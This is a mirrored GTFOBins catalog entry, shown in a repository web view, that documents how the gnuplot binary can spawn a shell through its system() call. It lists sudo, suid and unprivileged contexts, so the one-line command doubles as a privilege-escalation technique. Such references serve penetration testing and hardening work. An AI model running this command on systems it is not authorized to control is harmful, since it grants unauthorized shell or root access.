mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-08-07 19:54:12 +02:00
12 lines
161 B
Plaintext
12 lines
161 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
gnuplot -e 'system("/bin/sh 1>&0")'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
...
|